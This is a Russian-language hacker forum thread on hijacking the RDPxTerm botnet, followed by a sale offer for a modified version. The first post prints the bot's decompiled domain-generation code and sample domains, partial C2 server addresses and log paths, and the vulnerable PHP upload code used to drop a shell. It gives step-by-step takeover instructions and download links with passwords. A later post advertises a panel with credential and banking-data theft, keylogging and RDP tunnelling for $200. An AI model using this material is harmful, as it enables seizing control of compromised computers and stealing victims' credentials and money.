Угоняем BOTNet

[[x59]ReV]

Недавно мне на машину попал бот RDPxTerm версии 3.5.14, бот был декомпелирован без особых проблем.

priv8.ru​

Функционал бота:

- передает всю статистику о машине.
- устанавливает RDP плагин, в результате есть доступ к машине по rdp, причем текущего пользователя не выкидывает из сессии TermUser:TMPass32
- качается плагин MPК (KeyLoger)

Особого внимания заслуживает функция генерации серверов:

void gen_host(int flag,BYTE* HOST)
{
static int ind;
unsigned int size;

if ( flag ) ++ind;
if (ind > 20 ) ind = 0;
if ( !ind ) ind = 13;
DWORD k=0x57986u * (ind + 5);
size = k % 7 + 9;
DWORD s = (size ^ 0x1F3) +k;
DWORD d = s % 3 + 5;
for (int i = 0; i < size; ++i ){
if ( i == d ) 
HOST[i] = 0xB1u;
else
HOST[i] = (s % 0x1Au + 0x20) ^ 0xA1;
s =s+ (i ^ 0x14B);
}

HOST[size] = 0x8Fu;
HOST[size+1] = 0xC8u;
HOST[size+2] = 0xCFu;
HOST[size+3] = 0;
for (int j = 0;j<(size+3); ++j) HOST[j] ^= 0xA1u;
for (int j=0;j<size;j++){
if (HOST[j]==0x10){
HOST[j]+=0x1D;
}else{
HOST[j]+='A';
}
}
}

Как мы видим бот даже не проверяет кому пренадлежит сервер а отстукивается на сгенерированные им адреса.

Пример доменных имен:

qjbsif-wqblucrf.in
ibtkaxt-itdmu.in
sldukh-ysdn.in
kdvmczv-k.in
dwofvs-jdoyhpe.in
vogxnkg-vgqz.in
fyqhxu-lfq.in
yrjaq-jeyjtckzn.in
...

Для угона подобного ботнета нам нужено:

- cервер
- зарегестрированные доменные имена
- админка ботнета
- билд.

Найдя ип сервера на который отстукивается бот была найденна и сама админка.

_ttp://193.0.129.*4/esss/_xtcfg2/logs/access.log
_ttp://193.0.129.*4/esss/_xtcfg2/logs/bots.log

Как видим авторы не позаботились о правах доступа.
Найдя в логах пароль, попадаем в админку:

esss/admiral/adm.php

Заливка шелла:

1.
esss/xtfg.php

if((isset($_FILES['userfile']))&&(isset($_POST['dest']))){
$filepath=UPLOAD_DIR.'/'.safestr($_POST['dest']);
$error=$_FILES['userfile']['error'];

if(($error!=UPLOAD_ERR_PARTIAL)&&($error!=UPLOAD_E RR_OK)) die();

//echo "CCOPY ".$filepath."\n";
if(@file_put_contents($filepath,file_get_contents( $_FILES['userfile']['tmp_name']),FILE_APPEND)){
if($error==UPLOAD_ERR_OK) echo "#UPLOADED#";//protocol

Проходит без особых проблем во вкладке UPLOADS.



1. Устанавливаем админ панель на свой сервер.(Оригинальная версия.)

priv8.ru/rdp.tar.gz
[code]
расшифровал плагины из rdp\bbs\_xtcfg2\cabs для тех кто хочет модернизировать админку.
[code]
hххp://www.sendspace.com/file/u6ss11
Ahhash2cur1shaev0gei

2. Привязываем доменные имена на свой сервер.
3. Ждем отстука чужих ботов (отстук не мгновенный!)
4. Генерируем свой билд.

5.Заливаем ботам свой билд со своим уникальным диапазоном доменных имен.

В итоге получаем подобный Бот Нет.

Если тема интересна , могу снять видео.

 

[at0m]

[x59]ReV
извините за вопрос а этот бот не в паблике ?

 

[salamandra]

Продолжение банкета:
https://xakepy.cc/showthread.php?t=79457

 

[trust22]

Неплохая тема.
Видео было бы интересно.
Почем продавать будете?

 

[dCarnage]

 

[[x59]ReV]

RDPxTerm 5.1 (bild 4.4.2) priv8.ru edition.

Характеристики административной панели v.5.1:

- отображается вся статистика о машине
(в том числе логин и пароль активной сессии.)

- Время последней активности бота.

- собирает информацию о платежной системе/банкинге на зараженной машине.

- возможность обновить версию бота.

- Поиск по лог файлам. Возможность задавать теги к записям для удобства сортировки.

- FlashGrab

- разграничение доступа к административной панели бота.

- статистика по ботам.(оs,host,nat,token,e.t.c)

- логи об ошибках и доступе в административную панель.

- исправлена возможность не авторизованно просматривать логи о доступе к админ панели.

- исправлена возможность не авторизованно просматривать логи об отстуках ботов.

- исправлена ошибка позволяющая сгенерировать доменное имя из диапазона и перехватить ботов.

- логи сортируются по заданным ключам.

- устанавливает RDP плагин, в результате есть доступ к машине по rdp, причем текущего пользователя не выкидывает из сессии (TermUserMPass32.)

- поддерживается плагин MPK (кейлогер)

- работает загрузка других файлов

- работает апдейтер бота

- присутствует функция туннелирования если RDP порт закрыт для подключений.

- возможность изменить логин и пароль активной сессии.

- работает при отсутствие административных прав.


Характеристика Builder v.4.4.2:

- задает своё пространство имен
- определяет количество генерируемых доменов
- задает имя гейтового скрипта

Характеристика xTermTun57:

- Gui приложение полностью повторяющее функционал административной панели.

- Возможность принимать BackConnect соединения.

200$ rev0lver@jabber.ru +otr

 

[[x59]ReV]

at0m, нет. Лецензия стоит $10к

 

[el-]

[x59]ReV, т.е. ты барыга?

 

[[x59]ReV]

если человек переписавший 90% кода и превел в рабочее состояние самостоятельно то что не смогли доделать авторы - барыга, то да , но я себя таковым не считаю.
Мне не приятно что те кто покупают лицензию покупая у меня модификацию спрашивают а на сколько процентов работает рдп?
Продавая за $10к лицензию человек продает не 100% работающее по!
Та же функция flashGrab не работала до моей правки адекватно.
А код криптованый ACProtect для подобного ПО - верх халатности.
так-же отсутствие высталенных прав на фаилы , проверка пренадлежности домена и т.д
$200 цена моей работы не более.

 

[Apocalypse]

90% кода

Т.е у тебя есть сорцы?

 

[Left4Dead]

[x59]ReV
ты б хоть название продукта изменил и продавал как своё

 

[el-]

[x59]ReV, а можно два билда положит до и после твоих изменений для diff'а я думаю 90% изменений будут сразу заметны.

 

[DASM32]

Apocalypse

бот был декомпелирован без особых проблем

 

[p(eaZ]

Это не барыжничество, если изменил хоть немного функционала. Это нормально, ящитаю. Продавай на радость людям, и на зло дебилам с ЧСВ на уровне 10к.

 

[at0m]

нашел в инете незнаю какая версия вот собственно
Скачать|Download
pass:gh78rng987435g9743h24fg

 

[dCarnage]

 

[[x59]ReV]

да сорцы есть. за деньги могу положить до и после, не мало потрудился не хочу той же ситуации .
обладатили лицензии и моей версии знают разницу.

 

[el-]

[x59]ReV ну раз доказательств обратного нету, стало быть вы барыга и вас надо забанить. небось пофиксили баги в админке + пару штрихов в коде и вперед рубить капусту. сделали бы действительно другое имя, эдишен там или еще как то ...

p(eaZ нет, это барыжничество, никто не мешает лично вам или тс написать с нуля подобное, написать так же или даже лучше и раздавать это потом на шару на радость людям. что то я подобного не видел, обычно все считаю своим долго отвязать чужое, придумав этому оправдание и положить это в паблик ( или продать это как сейчас ), хоть бы раз кто положил свое.

 

[p(eaZ]

el-, нет, это не барыжничество.

сделали бы действительно другое имя, эдишен там или еще как то ...

Збс. Прилепил эдишен и уже не барыга. Отлично!

 

[el-]

p(eaZ , ты негодуешь потому что я твоего друга выпилил или потому что ты сторонник чистого барыжничества без ренеймов, едишенов и всего такого ? :P

к тому же я просил билды для сравнения, мало ли там действительно была проведена огромная работа, но автор пожелал быть забаненым, потому как он "не мало потрудился не хочу той же ситуации", т.е. не хочет что бы кто то вместо того что бы провести дифф его билдов, сделал бы еще одну доработку 90% кода и начал бы продавать это уже за 100